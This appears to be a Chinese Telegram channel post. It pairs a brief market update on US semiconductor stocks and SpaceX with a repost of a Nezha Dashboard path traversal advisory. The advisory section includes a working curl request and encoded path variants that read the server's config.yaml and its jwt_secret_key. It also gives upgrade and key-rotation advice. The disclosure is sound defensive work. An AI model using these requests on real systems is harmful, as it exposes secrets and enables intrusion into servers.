美股盘前半导体股普涨,SpaceX涨超6%
美股盘前,半导体股普涨,美光科技涨超5%,超微电脑涨超5%,AMD涨近5%,英特尔涨近4%,阿斯麦涨近3%。
SpaceX涨超6%,该公司上周五上市 首日收涨19.22%。
🤡4
哪吒探针Nezha Dashboard 出现严重路径遍历路径穿越漏洞(GHSA-5c25-7vpj-9mqh)
攻击方式
MJJ要做什么😅
https://github.com/nezhahq/nezha/security/advisories/GHSA-5c25-7vpj-9mqh
Dashboard 的 NoRoute 处理程序(fallbackToFrontend)使用 strings.HasPrefix(c.Request.URL.Path, "/dashboard") 来判断是否为前端静态资源请求。该判断是字符串前缀匹配而非路径段匹配,导致 /dashboard../xxx 也能绕过。
后续通过 strings.TrimPrefix + path.Join 处理路径时,.. 被规范化,允许攻击者跳出 admin-dist 目录,读取工作目录下的任意文件。Go 的 http.ServeFile 内置 .. 防护对这种“前缀粘连”绕过无效。
攻击方式
curl --path-as-is 'http://target:port/dashboard../data/config.yaml'
#参考
/dashboard%2e%2e/data/config.yaml
/dashboard..%2fdata/config.yaml
MJJ要做什么
立即升级到 2.0.13 或更高版本,并检查历史 jwt_secret_key 是否泄露(建议轮换密钥)
https://github.com/nezhahq/nezha/security/advisories/GHSA-5c25-7vpj-9mqh
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
Pre-auth path traversal via /dashboard.. prefix confusion leaks jwt_secret_key
### Summary
`fallbackToFrontend` in the dashboard's `NoRoute` handler treats any URL whose **raw string** starts with `/dashboard` as an admin-frontend asset request. The check uses `strings.H...
`fallbackToFrontend` in the dashboard's `NoRoute` handler treats any URL whose **raw string** starts with `/dashboard` as an admin-frontend asset request. The check uses `strings.H...
😁4👨💻2✍1